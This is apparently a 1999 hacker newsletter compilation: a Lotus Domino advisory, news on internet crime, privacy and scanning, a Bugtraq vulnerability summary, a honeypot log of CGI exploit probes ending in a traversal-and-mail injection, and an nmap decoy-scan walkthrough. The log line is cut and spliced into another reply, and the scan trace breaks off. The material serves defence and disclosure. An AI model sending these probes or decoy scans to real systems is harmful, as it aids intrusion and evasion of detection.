ISS X-FORCE ADVISORY ON LOTUS NOTES DOMINO SERVER 4.6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 10:05 pm CET ISS X-force reports a denial of service attack against the integrated messaging and web application server, because of an overflow problem in the Notes LDAP Service. Your are recommended to upgrade to Maintenance release 4.6.6 or 5.0. Here is the complete advisory. http://xforce.iss.net/alerts/advise34.php3 ISS Security Advisory August 23, 1999 Denial of Service Attack against Lotus Notes Domino Server 4.6 Synopsis: Lotus Domino Server is an integrated messaging and web application server. An attacker can crash the Lotus Notes Domino server and stop e-mail and other services that Domino provides for an organization. Description: There is an overflow problem in the Notes LDAP Service (NLDAP); the service that handles the LDAP protocol. This overflow is related to the way that NLDAP handles the ldap_search request. By sending a large amount of data to the parameter in the ldap_search request, an attacker can cause a PANIC in the Domino Server. This will allow an attacker to stop all Domino services running on the affected machine. Affected Versions: Lotus Notes Domino server 4.6. Recommended Action: Upgrade to Maintenance release 4.6.6 or 5.0. Additional Information: Information in this advisory was obtained by the research of Caleb Sima of the ISS X-Force. ISS X-Force would like to thank Lotus Development Corporation for their response and handling of this vulnerability. ________ About ISS: ISS leads the market as the source for e-business risk management solutions, serving as a trusted security provider to thousands of organizations including 21 of the 25 largest U.S. commercial banks and more than 35 government agencies. With its Adaptive Security Management approach, ISS empowers organizations to measure and manage enterprise security risks within Intranet, extranet and electronic commerce environments. Its award-winning SAFEsuite(r) product line of intrusion detection, vulnerability management and decision support solutions are vital for protection in today's world of global connectivity, enabling organizations to proactively monitor, detect and respond to security risks. Founded in 1994, ISS is headquartered in Atlanta, GA with additional offices throughout the U.S. and international operations in Australia/New Zealand, Belgium, France, Germany, Japan, Latin America and the UK. For more information, visit the ISS Web site at www.iss.net or call 800-776-2362. Copyright (c) 1999 by Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc. @HWA 52.0 TECHNOLOGY KEY TO TRACKING DOWN INTERNET CRIME ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 9:45 pm CET A recently formed working group focused on rooting out Internet-related crime may model technologies that law enforcement agencies use to sift through the Internet to keep tabs on online illegal activity. As we reported earlier, US president Clinton this month established the working group to examine how law enforcement agencies can better investigate and prosecute criminal activities conducted on the Internet. Among other things, the group will scrutinize the ways in which the government uses technology to crack down on Internet-related crime. The FBI is expected to take the lead in developing technology that the federal government will use to comb the Internet in search of criminal activity. Full story AUGUST 23, 1999 Technology key to tracking down Internet crime BY DOUG BROWN (dbrown@fcw.com) A recently formed working group focused on rooting out Internet-related crime may model technologies that law enforcement agencies use to sift through the Internet to keep tabs on online illegal activity. President Clinton this month established the working group, made up of top government officials, to examine how law enforcement agencies can better investigate and prosecute criminal activities conducted on the Internet, such as the online sale of guns and illegal drugs, fraud and the peddling of child pornography. The Clinton administration decided to form the group because there was "recognition within the government that there were some real issues" concerning computer crime that needed to be addressed, a White House official said. "There was an explosion [of legislation] at both the federal and the state level, and there was concern that if we passed a lot of legislation without taking a systematic look at this, we would end up with a haphazard approach to the problem." Among other things, the group will scrutinize the ways in which the government uses technology to crack down on Internet-related crime. Understanding the technologies agencies use now, the White House official said, will help the administration decide how it can improve the investigation and prosecution of online criminal activity in the future. Some helpful technology applications may come from the FBI, a representative from which will serve on the task force. The FBI is expected to take the lead in developing technology that the federal government will use to comb the Internet in search of criminal activity. The FBI's Baltimore field office leads a project called Innocent Images, which works to identify and arrest online sexual predators. About 20 agents are assigned to the project full time, said Special Agent Barry Maddox, a spokesman for the field office. Hundreds of other agents and local law enforcement officials in cities nationwide also work with Innocent Images. The agents join online chat groups about pedophilia or child pornography and also pose as children to try to catch pedophiles who attempt to set up face-to-face meetings. The program, which was established in 1995, has led to 378 arrests and 322 convictions, Maddox said. Advancements developed elsewhere in the FBI also may be considered by the administration's working group. Such developments include the soon-to-be launched computer crimes squad, which will investigate crimes committed by hackers, and the National Infrastructure Protection Center, which works to prevent people or groups from hacking into vital government systems that operate such things as water supplies and transportation systems. The group also may look at increasingly sophisticated and powerful Internet search engines as a way to sniff out Internet-related crime, said Rich Kellett, director of the General Services Administration's Emerging Information Technologies Policies Division. With some companies laboring to "store everything that is on the Internet," Kellett said, "you can imagine what kind of base of information you could put together" with such databases. Combining powerful search engines with enormous databases would provide "interesting cross-sections of what is going on in America, including criminal activity." Kellett also mentioned the Search for Extraterrestrial Intelligence, a project involving more than 800,000 computers networked together that share information about radio signals and work together to compute algorithms in the hope of pinpointing evidence of life in outer space. A model like this, he said, could be used to sift through Internet data in search of criminal activity. One problem with such massive undertakings, he said, is that "the use of all of that information and sorting through it all has tremendous public policy issues, in terms of privacy," Kellett said. Daniel Boyle, SAS Institute Inc.'s director of the Defense Department and defense intelligence, said the working group likely will consider different ways of using data mining to deal with online criminal activity. The SAS Institute, Cary, N.C., is a major supplier of custom software to the federal government. With a tidal wave of data coursing through the Internet every day, it would be impossible to successfully locate criminal activity just through pointing and clicking a mouse, Boyle said. What is needed are data-mining software tools that sift through data in search of anomalies or patterns - things that "don't look quite right," he said. "They've got to find them first, and one of the techniques is data mining." Of use to government investigators, he said, might be "dump logs," or records of people who have visited individual World Wide Web sites. Servers, he said, "create volumes of these logs, [which] are tremendous and...exploding every day." The logs are used by private companies to see who is visiting their sites, but they also could be useful in tracking crime, he said. Ari Schwartz, a policy analyst at the Washington, D.C.-based Center for Democracy and Technology, cautioned working group members to keep privacy concerns in mind when they draft their report, which is due in December. "This discussion could lead to a whole new set of monitoring tools," he said. "We hope this doesn't change the way people surf the Net. We don't want to have people think government is monitoring their lives." Because it is so open, the Internet already has a vital monitoring system in place: the eyes of the millions of people clicking throughout cyberspace. New monitoring tools, he said, may be superfluous. The government is considering a plan to monitor many non-DOD computers for signs of intrusion. In its quest to protect government computers from outside attacks, the proposed plan, called the Federal Intrusion Detection Network, unnecessarily sacrifices privacy, Schwartz said. @HWA 53.0 GOVT HOME-INVASION BILL DRIVES US PC USERS TO CANADA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 9:20 pm CET The recently proposed and already very much discussed US Justice Department bill that would allow police to secretly enter homes and disable security features on computers has driven tens of thousands of Americans to request privacy protection in the form of the Freedom product from Canadian firm Zero-Knowledge Systems, the company announced today. Newsbytes Govt Home Invasion Bill Drives US PC Users To Canada By Martin Stone, Newsbytes MONTREAL, QUEBEC, CANADA, 24 Aug 1999, 12:09 PM CST A proposed US Justice Department bill that would allow police to secretly enter homes and disable security features on computers has driven tens of thousands of Americans to request privacy protection from Canadian firm Zero-Knowledge Systems, the company announced today. "This has created a huge wave of concern among computer users in the US," said Zero-Knowledge President Austin Hill, of the proposed legislation. Hill told Newsbytes that, when news of the proposed measure broke last Thursday, his office was flooded with calls and messages from American Internet users inquiring about the availability of his company's security system, called Freedom, which uses a sophisticated network of encoding and remote servers to obscure Internet "trails." "We've received e-mail, telephone messages, and thousands of Freedom beta sign-ups from people looking to secure their privacy. It's highly ironic that a Canadian company is being flooded by requests to protect American citizens from their own government," Hill said. Zero-Knowledge is presently beta-testing its Freedom technology, which provides total privacy for Web, e-mail, newsgroup, and chat-room activities by encrypting data and rerouting it through independently-operated servers scattered worldwide. Hill says an improved beta version will soon enter testing and that, based on the latest flood of interest, his company is scaling-up to accommodate, what he says will be, "millions and millions of computer-users all over the world" once the product hits the market later this year. The system has been called "the only fully trustworthy privacy solution" by some privacy advocates. According to reports published last week, the Justice Department will seek authorization through the Cyberspace Electronic Security Act for FBI and local police to covertly enter private homes and disable computer encryption programs. The proposal would dramatically increase police powers by allowing agents to tamper with personal computers to surreptitiously monitor personal communications. "It's disappointing that US consumers must look to other countries for protection from a government they feel is overstepping its investigative authority," David Sobel, general counsel for the Electronic Privacy Information Center in Washington, told Hill following the announcement of the proposed bill. "The United States should be in the forefront of privacy technology, not trying to circumvent it." Montreal-based Zero-Knowledge says it benefits from Canada's support for the development of strong privacy solutions, in contrast with what it says is the US government's stringent controls on encryption and privacy technologies. Hill says that, because his company's system masks electronic trails, law enforcement agencies would not be able to identify computers from which possibly unlawful transmissions were being made, so they would be unable to identify which house to enter under the proposed legislation. He says his system would discourage "fishing expeditions" which could result from the projected bill. More information on the Zero-Knowledge technology can be found at http://www.zeroknowledge.com Reported by Newsbytes.com, http://www.newsbytes.com 12:09 CST Reposted 18:09 CST @HWA 54.0 HACKERS SCANNING FOR TROUBLE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 9:00 pm CET Every day they come, they lurk -- then they leave without doing damage. They come through clients' computers, through Canadian ISPs, they hack into Linux boxes, NT boxes, Unix boxes. Hack by day or night, but they only look and don't touch. These kinds of vulnerability scan attacks are causing concern and also bring up some murky legal issues. Dragos Ruiu wrote a report for SecurityFocus and ZDNet has a story on it. -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Hackers scanning for trouble By Bob Sullivan, MSNBC August 24, 1999 5:38 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2319298,00.html Dragos Ruiu was just minding his own business, a Vancouver software startup, when it started. Day after day, relentlessly, someone or some group out there on the Internet is banging away at his servers, sneaking in and gaining full access. A security expert, he knows what's happening: He's being probed. Is this mere sport, or a "casing," like a bank robber who visits the bank several times to study its security systems before the heist? Every day they come, they lurk -- then they leave without doing damage. And Ruiu is powerless to stop it. Every method he has tried, they have trumped. They're toying with him. "They must feel like gods," he says. They come at him through clients' computers, through Canadian ISPs, once even through one of the largest Canadian banks. They hack into Linux boxes, NT boxes, Unix boxes. Hack by day or night. No matter. And all for no apparent reason. They look, but don't touch. Ah, the life of a network administrator these days. There are thousands of ways to break into a computer, and there are now several downloadable software packages designed to scan the Internet for Web sites and servers that have just one flaw. According to Peter Tippett at computer security research firm ICSA, a new box connected to the Net will almost certainly be "scanned" before one week goes by. And the amount of scanning activity has doubled in the past six months. That's about when the scanning started for Brandon Pepelea, a former employee at PSINet who says his collection of Web sites has been scanned systematically several times a week since January. In another example of a victimless probe, Pepelea thinks someone or something has been banging through all the Internet addresses between 38.240.x.x and 38.200.x.x, a so-called Class-B range of addresses that constitute about 16,000 possible computers. In his case, the scans were unsuccessful. Whoever or whatever it is, they haven't been able to break into Pepelea's computers. Still, the relentless, systematic nature of the probe has him spooked. He's been demanding that PSINet, which owns all the addresses in the 38.x.x.x range, chase down the scanner and prosecute. "I don't think they understand how serious it is," Pepelea said. "The threat not so much being the nature of the scan but the scope of the scan... If you're between 38.240 and 38.200 you've had the scans. They've walked through and gotten to you." Nose for trouble The attack itself involves use of the Simple Network Management Protocol, frequently used on network routers. Pepelea owns machines between the 38.240 and 38.200 address range, and concluded scans spanned that range by studying patterns of hits to his own and his client's machines. This is not the first time Pepelea, now CEO of a small security company he calls "Designer's Dream," has done a hefty amount of personal cybersleuthing. Last December, he compiled information on a virus writer named VicodinES, and shared it with the FBI, the CIA and other law enforcement agencies. His tips fell on deaf ears, and VicodinES, who the world now knows as Dave Smith, went on to release the Melissa virus. Pepelea's hell bent on being heard this time around. "Once again, nobody cares," he laments. PSINet said early last week the scans were being generated by an account serviced by the company, and that it had dealt with the matter by canceling the account. But by Friday, the company had canceled three more accounts in an effort to stop the probes. While officials there say they take the matter seriously, they are not convinced it's an organized hacker attack. "It's not possible to characterize whether this is a mistake, a malicious event, was planned, or it just happened," said Cole Libby, Director of Network Engineering. For example, it could a wrongly configured piece of hardware searching a section of the Internet for a new printer. "There are lots of examples of technology out of control in the world." No harm, no foul? Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to see who leaves the front door unlocked, brings up murky legal issues. Entering someone else's computer is illegal, but scanning, which amounts to asking a computer how it's been set up, probably isn't. Pepelea says PSINet told him to pursue legal action against his cyberpest -- but for what? Meanwhile, Pepelea thinks PSINet should be liable if any real trouble ever comes from his suspected hacker, particularly since the Net provider was warned. That's not likely, says Internet law expert Dorsey Morrow. PSINet would almost certainly face no criminal liability for the actions of a hacker on their network, and wouldn't likely face civil liability either. "As long as they can show 'We were doing everything we can. We've got security policies in place. We're using the latest software.' That mounts up to a pretty good defense," Morrow said. So there's no consequences for scanning, either to the hacker or the company that provides the means. But what of Ruiu's hackers, who go just one step further than Pepelea's scanners? They scan, then enter, lurk around, and leave. Dancing tantalizingly over the edge of the law, they show an ability to do far more damage. Their methods are painstakingly deliberate, designed to avoid detection. They launch attacks from multiple sites, sometimes sending no more than a packet per day from any site, in order to hide the kind of suspicious activity protective "sniffer" programs look for. "We saw one new machine coming at us every five minutes," Ruiu said. "They must have felt like gods because they could break into any machine they wanted." That includes a collection of Canadian ISPs, and even one major Canadian bank, the hackers broke into. When he called, Ruiu often had a tough time convincing victimized ISP administrators they'd been hacked. "The reaction of ISPs was disbelief," he said. "One didn't believe us until a marketing guy had his laptop taken out and it started sending weird packets." Ruiu is convinced the hacks are coming from a coordinated team, because of their speed and variety. But while the cat-and-mouse game continues, he can only speculate on motive. His company, a 15-person startup called Netsentry.net, is hardly a big target. So Ruiu thinks his outside efforts in the security community are likely to blame. He recently worked on project called "Trinux," which aimed to create a security-enhanced version of Linux that fits on one floppy disk. Among his partners was Ken Williams, who until recently ran Packet Storm Security, perhaps the most popular reference site in the hacker community. "I suspect these guys are targeting security software," he said, but added they have not revealed their intentions. "This is really bugging me. The lack of a motive really disturbs me…it gave me the creeps." The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the hackers when he could be working to get his business off the ground. "There are a lot of assumptions we're all making about Internet security that we shouldn't," he said. "There's a lot of things we don't know." For example, these hackers made a habit of hijacking machines Ruiu's computers normally talked to, then initiated attacks from these supposedly "friendly" computers. That made them almost impossible to detect. "If they get a machine that's close to your machine, that's almost as bad as taking over your Web server. It's a great place to launch an attack on your firewall," he said. Nothing about Ruiu or Pepelea's stories surprised ICSA's Tippett, who expects security problems to get worse before they get better. "It's the wild, wild West out there," he said. "The tools are pervasive and so common. The chance of getting caught is pretty slim… Our neighbors are now very close and enough of them don't have a great social conscience." A more extensive report on the one of these attacks, written by Ruiu, can be found at www.securityfocus.com. @HWA 55.0 Canada Net they've built a super fast network, but what to do with it? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Great Wired North Canada Builds the World’s Fastest Network — And Wonders How to Use It Canada’s new CA*Net3 research network will link government, business and universties across the country with a 100 percent fiber-optic network and then what? (ABCNEWS.com) By Michael J. Martinez ABCNEWS.com Aug. 27 — What if there were a brand-new, fiber-optic, blazingly fast, nationwide computer network — and no one knew quite what to do with it? Using a $55 million grant from the Canadian government, a consortium of universities and businesses has fashioned a next-generation, Internet-style network, stretching from Nova Scotia to British Columbia. So speedy is CA*Net3, as the network is called, that the entire contents of the U.S. Library of Congress could be transmitted from one end of Canada to the other in just one second. In the United States, the Internet2 project can handle that kind of load — but it still takes a full minute for a bicoastal download. Canada hopes to use this world’s fastest nationwide network to stake its claim to the high-tech future. Unlike Internet2, however, CA*Net3 is finding it difficult to attract researchers who can use the brand-new network. “Nobody knows what we’re going to use this for,” says Alan Greenberg, director of computing at McGill University in Montreal. “But that’s the reason you build these things — so that people can find new ways to do things.” Pure Optics Unlike other research networks, including the ARPANet system that formed the basis for today’s Internet, CA*Net3 is completely optical — no telephone lines are used. Instead, the Canadian government stretched fiber-optic cable across the country, linking it to 11 “gigapops,” network hubs that serve as switching stations for billions of bits of data per second. Other networks, including Internet2 and the Next-Generation Internet project in the United States, also use backup layers, in addition to fiber optics, to ensure that data will continue to flow if the fiber-optic cables are cut or disrupted. However, CA*Net3 doesn’t have those backups. Instead, data are automatically rerouted at the gigapops if a disruption is detected. Rerouting uses network rings — loops of cable interconnected with the gigapops. “In our network rings, we automatically use both sides of the ring in transmitting data,” says Bill St. Arnaud, the senior director of network projects for the Canadian Network for the Advancement of Research, Industry and Education (Canarie), which is running CA*Net3. “Thus, if one side of the loop goes down, the other side can pick up the slack.” Rainbow of Data CA*Net3 also employs new technology that allows different wavelengths of light to be transmitted along the same fiber-optic cable. By using eight colors of light, the amount of data sent through the cable can be increased by a factor of eight. That means 80 gigabits of data per second can be transmitted through CA*Net3 every second. That’s 1.4 million times faster than the download speed of a 56K modem, and about 60 times faster than America’s Internet2 project. And it could improve even more, St. Arnaud says. Theoretically, an infinite number of wavelengths of light could pass through a fiber-optic cable without interfering with each other. Right now, researchers are working on transmitting data on 2,000 wavelengths — somewhere in the neighborhood of 20,000 gigabits or 20 terabits. Filling the Pipe Now all that’s needed are applications to make use of such huge bandwidth. “Everyone is used to dealing with small bandwidth,” Greenberg says. “They’re still trying to figure out how best to use this really big pipe they’ve been handed.” A few ideas have been advanced. Canada’s national human genome project, an effort to map all the DNA in the human body, is using CA*Net3 to link 40 powerful computers to perform necessary calculations. The Canadian National Film Board is also using the network, to create an on-demand movie jukebox. Computers linked to CA*Net3 can request one of 700 movies currently online. The film board’s server controls a robotic arm that can select and play the DVD-ROM of the film, sending it over CA*Net3. In the next few years, St. Arnaud hopes to link public schools to the new network, using only fiber-optic cables and giving schools total access to the immense amount of bandwidth available. From there, it’s easy to envision connecting every Canadian home to the optical network. With an increase in the number of light wavelengths available, there will be enough bandwidth for generations. And what they’ll do with it is anyone’s guess. @HWA 56.0 Security Focus' BUGTRAQ summary ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus News, Issue 3, 1999-08-16 to 1999-08-22 II. BUGTRAQ SUMMARY 1999-08-16 to 1999-08-22 ---------------------------------------- 1. SuSE identd Denial of Service Attack Bugtraq ID: 587 Remote: Yes Date Published: 1999-08-16 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=587 Summary: In certain distributions of SuSE Linux the in.identd daemon is started with an option that causes one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons. This can lead the machine to starve itself of memory resulting essentially in a machine halt. 2: Microsoft IIS And PWS 8.3 Directory Name Vulnerability Bugtraq ID: 582 Remote: Yes Date Published: 1999-08-16 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=582 Summary: In Microsoft's IIS and PWS, requesting the 8.3 filename version of a directory effectively bypasses the security attributes that are referenced to the full, long version of the filename, with permissions being based instead on those of the parent directory. Successful exploitation of this vulnerability could lead not only to unathorized directory listings, but also to the remote execution of 'protected' scripts. 3: Multiple Vendor 8.3 Directory Name Vulnerability Bugtraq ID: 584 Remote: Yes Date Published: 1999-08-16 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=584 Summary: In the Netscape, vqServer and Xitami webservers, restrictions applied to directories with long filenames will be ignored if the 8.3 version of the filename is requested. In Serv-U, the 'cwd' and 'site exec' commands are susceptible to a similar vulnerability. Other Windows32-based HTTP and FTP servers may have the same or similar vulnerabilities. 4: Microsoft Windows 98 IE5/Telnet Heap Overflow Vulnerability Bugtraq ID: 586 Remote: Yes Date Published: 1999-08-16 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=586 Summary: Windows 98 systems running specific versions of IE5 (5.00.2314.1003 and 5.00.2314.1003IC) are susceptible to a remote vulnerability that allows the execution of arbitrary code on a target that views a malicious web page. This vulnerability is due to a combination of two different weaknesses, one in telnet.exe and one in the latest versions of IE5. 5: Oracle Intelligent Agent Vulnerability Bugtraq ID: 585 Remote: Yes Date Published: 1999-08-16 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=585 Summary: Oracle installations with the 'Oracle Intelligent Agent' installed have a path related vulnerability. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin . This setuid root program calls a tcl script ( nmiconf.tcl ) located by default in $ORACLE_HOME/network/agent/config. The problem is that the dbsnmp script relies on an environment variable (the path to nmiconf.tcl) which can be a set by a user. Therefore, intruders can force the script to execute a trojaned version of nmiconf.tcl which will run as root. 6: xmonisdn IFS/PATH Vulnerability Bugtraq ID: 583 Remote: No Date Published: 1999-08-16 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=583 Summary: Xmonisdn is an X applet that shows the status of the ISDN links which ships with the isndutils package from Debian GNU/Linux 2.1. You can configure it to run two scripts when the left or right mouse button are clicked on it. Xmonisdn was installed setuid root so that the scripts could do things like add and delete the default route. However is that while the scripts were checked for owner root and not writeable by group or others the scripts are run via the system() library function, which spawns a shell to run it. This means that the scripts are open to attack via IFS and/or PATH manipulation. Debian has made patches available at the following locations: http://security.debian.org/dists/stable/updates/binary-alpha/isdnutils_3.0-12slink13_alpha.deb http://security.debian.org/dists/stable/updates/binary-i386/isdnutils_3.0-12slink13_i386.deb http://security.debian.org/dists/stable/updates/binary-sparc/isdnutils_3.0-12slink13_sparc.deb 7: Mini SQL w3-msql Vulnerability Bugtraq ID: 591 Remote: Yes Date Published: 1999-08-18 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=591 Summary: Under certian versions of Mini SQL, the w3-msql CGI script allows users to view directories which are set for private access via .htaccess files. Version 2.0.11 of the Mini SQL Server contains a fix for this problem. Details available at: http://support.Hughes.com.au/cgi-bin/hughes 8: AIX Source Code Browser Buffer Overflow Vulnerability Bugtraq ID: 590 Remote: Yes Date Published: 1999-08-18 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=590 Summary: A buffer overflow vulnerability has been discovered in the Source Code Browser's Program Database Name Server Daemon (pdnsd) of versions 2 and 3 of IBM's C Set ++ for AIX. This vulnerability allows local and remote users to gain root access. While IBM no longer supports the affected versions, there is a workaround available at the above URL. 9: BSDI Symmetric Multiprocessing (SMP) Vulnerability Bugtraq ID: 589 Remote: No Date Published: 1999-08-18 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=589 Summary: A vulnerability exists in BSDi 4.0.1 Symmetric Multiprocessing (SMP). During high CPU usage it is possible to cause BSDi 4.0.1 (possibly others but untested) with all current patches to stop responding and 'lock up' when a call to fstat is made. 10: Redhat Linux tgetent() Buffer Overflow Bugtraq ID: 588 Remote: No Date Published: 1999-08-18 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=588 Summary: A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Red Hat has released a series of rpms to solve this issue. Please see 'solution' at the above URL for more information. 11: Linux in.telnetd Denial of Service Vulnerability Bugtraq ID: 594 Remote: Yes Date Published: 1999-08-19 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=594 Summary: When a telnet client connects to in.telnetd, the two attempt to negotiate a compatible terminal type (via the TERM environment variable). When the TERM variable in the client is set before connecting, it's possible that, depending on what TERM was set to, a denial of service can be caused. Red Hat has released a series of rpms to solve this issue. Please see 'solution' at the above URL for more information. 12:QMS 2060 Printer Passwordless Root Vulnerability Bugtraq ID: 593 Remote: Yes Date Published: 1999-08-19 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=593 Summary: Access to the QMS 2060 printer is controlled by the passwd.ftp file. This file contains simply a list of usernames and passwords. However, even with this file in place, root can still logon without a password entered. This would allow the attacker to alter the passwd.ftp file, as well as the hosts file which lists tha machines authorized to print to the QMS. 13: Microsoft JET Text I-ISAM Vulnerability Bugtraq ID: 595 Remote: Yes Date Published: 08/20/99 Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=595 Summary: Microsoft's JET database engine includes a functionality referred to as Text I-ISAM. This allows the JET driver to write to a text file, for the purpose of another application to read later. This was implemented to allow data sharing between JET applications and other applications that don't support Dynamic Data Exchange. The vulnerability lies in the fact that any text file can be written to, including system files. Because of this, a database query could be created that added destructive commands to a startup file or script. Microsoft has released patces for both JET 3.5x and 4.0: 3.5x: http://www.securityfocus.com/external/http://support.microsoft.com/download/support/mslfiles/Jet35sp3.exe 4.0: http://www.securityfocus.com/external/http://support.microsoft.com/download/support/mslfiles/Jet40sp1.exe @HWA 57.0 A typical script kiddie attack scenerio against HTTP server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Picked up from the message board of www.securityfocus.com... To: Incidents Subject: kiddie attack via http Date: Wed Aug 18 1999 05:13:35 Author: acpizer Message-ID: Once upon a time, I've setup a small bait, for lusers such as this one, and it finally paid off: Aug 12 09:44:52 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:52 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:52 snork fun-httpd: cmd buff: GET /asakaeval HTTP/1.0^M ^M Aug 12 09:44:52 snork fun-httpd: cmd buff: GET /cgi-bin/phf/ HTTP/1.0^M Aug 12 09:44:53 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:53 snork fun-httpd: cmd buff: GET /cgi-bin/phf/ HTTP/1.0^M Aug 12 09:44:54 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:54 snork fun-httpd: cmd buff: GET /cgi-bin/php.cgi/ HTTP/1.0^M Aug 12 09:44:55 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:55 snork fun-httpd: cmd buff: GET /cgi-bin/campas/ HTTP/1.0^M Aug 12 09:44:56 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:56 snork fun-httpd: cmd buff: GET /cgi-bin/htmlscript/ HTTP/1.0^M Aug 12 09:44:57 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:57 snork fun-httpd: cmd buff: GET /cgi-bin/aglimpse/ HTTP/1.0^M Aug 12 09:44:58 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:44:59 snork fun-httpd: cmd buff: GET /cgi-bin/websendmail/ HTTP/1.0^Aug 12 09:45:00 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:45:00 snork fun-httpd: cmd buff: GET /cgi-bin/websendmail/ HTTP/1.0^M Aug 12 09:45:01 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:45:01 snork fun-httpd: cmd buff: GET /info2www HTTP/1.0^M Aug 12 09:45:03 snork fun-httpd: cmd buff: GET /cgi-bin/pfdispaly.cgi/ HTTP/1.0Aug 12 09:45:04 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:45:04 snork fun-httpd: cmd buff: GET /scripts/convert.bas/ HTTP/1.0^M Aug 12 09:45:19 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:45:19 snork fun-httpd: got connection from 204.60.37.97 Aug 12 09:45:19 snork fun-httpd: cmd buff: GET /info2www '(../../../../../../../bin/mail For details on many cgi based vunerabilities, i suggest having a look at http://v0rt.dayrom.com.au under the advisories section. we list alot of common cgi vunerabilities aswell as a tool to scan for most of these (http://v0rt.dayrom.com.au/profiler/profiler.c) As for the /asakaeval attack, i also have not seen any information regarding this. As a final note, also check your access_log for entries sent as hex, in some httpd servers they do not correct log requests sent as hex, therefor its not obvious asto what they are scanning for to the naked eye. v0rt_ ------------------------------------------------------------------------------- "Probably you've only really grown up, when you can bear not being understood." Marian Gold /Alphaville @HWA 58.0 NMAP - Scan Analysis (v2) ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.whitehats.com/ Hello, This page is for anyone who cares to see the details behind an NMAP scan with the -D decoy option set. Basically I hope to answer two questions: Does NMAP spoof every aspect of the scan, including ICMP, ACK, and OS Identification? (yes, beautifully if used properly) Can you tell which host in a Decoy Storm is the real host? (no, if used properly) When I created a case study of these topics earlier today I used decoy hosts that were not responsive (nonexistent IP addresses). Fyodor quickly pointed out that this breaks one of the cardinal rules of decoy scanning. The decoys must be alive. :) NMAP appears to correctly spoof identical packets for every operation, sending an identical packet for each source address (your local system, and each of the decoys). My initial testing showed that only the local system sends RST's in response to successfully queried ports in a SYN scan. However, this behavior is correct. The local system should not send RST's on behalf of the other systems, because that is exactly what they are supposed to do. My test decoys (23.23.23.23 and 24.24.24.24) are not active hosts, and so would not generate the expected RST packets. Had I used responsive decoy hosts, the local system source address would be indistinguishable from the others. FIN, NULL, XMAS, and UDP scans appear to work equally well with the -D decoy option. Hope someone finds this remotely useful or interesting. -Max Vision Decoys, without OS detection [audit ~]# nmap -sS -D23.23.23.23,ME,24.24.24.24 -p 80 www.example.com Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) ICMP Probe 19:44:00.294222 23.23.23.23 > www.example.com: icmp: echo request 19:44:00.304222 audit.example.com > www.example.com: icmp: echo request 19:44:00.304222 24.24.24.24 > www.example.com: icmp: echo request ACK Probe 19:44:00.314222 23.23.23.23.38159 > www.example.com.http: . ack 0 win 1024 19:44:00.314222 audit.example.com.38159 > www.example.com.http: . ack 0 win 1024 19:44:00.314222 24.24.24.24.38159 > www.example.com.http: . ack 0 win 1024 Hey we got a live one here!@#$ 19:44:00.324222 www.example.com.http > audit.example.com.38159: R 0:0(0) win 0 (DF) SYN scan 19:44:00.394222 23.23.23.23.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024 19:44:00.394222 